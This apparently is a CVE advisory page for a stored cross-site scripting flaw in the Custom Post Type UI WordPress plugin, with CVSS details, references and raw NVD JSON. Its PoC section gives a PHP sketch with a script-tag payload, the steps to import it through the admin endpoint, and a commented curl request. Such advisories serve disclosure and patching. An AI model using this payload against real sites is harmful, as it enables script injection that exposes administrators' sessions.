Security Vulnerability Report
CVE-2025-14056 CVSS 4.4 MEDIUM

Published: 2025-12-13 16:16:48
Last Modified: 2026-04-15 00:35:42

Description

The Custom Post Type UI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'label' parameter during custom post type import in all versions up to, and including, 1.18.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses the Tools → Get Code page.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Custom Post Type UI plugin <= 1.18.1 (all versions up to and including 1.18.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * CVE-2025-14056 PoC - Custom Post Type UI Stored XSS via label parameter
 * Requirements: WordPress admin access
 * Target: Custom Post Type UI plugin <= 1.18.1
 */

// XSS payload for the label parameter
$xss_payload = '<script>console.log(document.cookie)</script>';

// Step 1: Craft malicious import data with XSS in label field
$malicious_import_data = [
    'cpt_custom_post_types' => [
        [
            'label'         => $xss_payload,
            'labelSingular' => 'Test Post Type',
            'slug'          => 'test-cpt',
            'description'   => 'Malicious CPT',
        ],
    ],
];

// Step 2: Send POST request to import endpoint
// POST to: /wp-admin/admin.php?page=cpt_import_export
// Parameters: cpt_import (JSON encoded data)

// Step 3: Trigger XSS by accessing Tools -> Get Code page
// GET: /wp-admin/admin.php?page=cpt_import_export

// Example curl command:
// curl -X POST "http://target.com/wp-admin/admin.php?page=cpt_import_export" \
//   -d "cpt_import=...malicious_json..."

// The stored script will execute when any user visits the Tools page.
?>

References

https://github.com/WebDevStudios/custom-post-type-ui/pull/1014/files#diff-bd3331205024f12a78d74b312bc4f5ad118b5734999bf53a4a95e0959891f60a
https://plugins.trac.wordpress.org/browser/custom-post-type-ui/tags/1.18.1/inc/tools-sections/tools-post-types.php#L201
https://plugins.trac.wordpress.org/browser/custom-post-type-ui/trunk/inc/tools-sections/tools-post-types.php#L201
https://www.wordfence.com/threat-intel/vulnerabilities/id/890c743e-da5e-46ed-a011-cecd24778163?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14056", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:47.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Custom Post Type UI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'label' parameter during custom post type import in all versions up to, and including, 1.18.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses the Tools → Get Code page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/WebDevStudios/custom-post-type-ui/pull/1014/files#diff-bd3331205024f12a78d74b312bc4f5ad118b5734999bf53a4a95e0959891f60a", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/custom-post-type-ui/tags/1.18.1/inc/tools-sections/tools-post-types.php#L201", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/custom-post-type-ui/trunk/inc/tools-sections/tools-post-types.php#L201", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/890c743e-da5e-46ed-a011-cecd24778163?source=cve", "source": "[email protected]"}]}}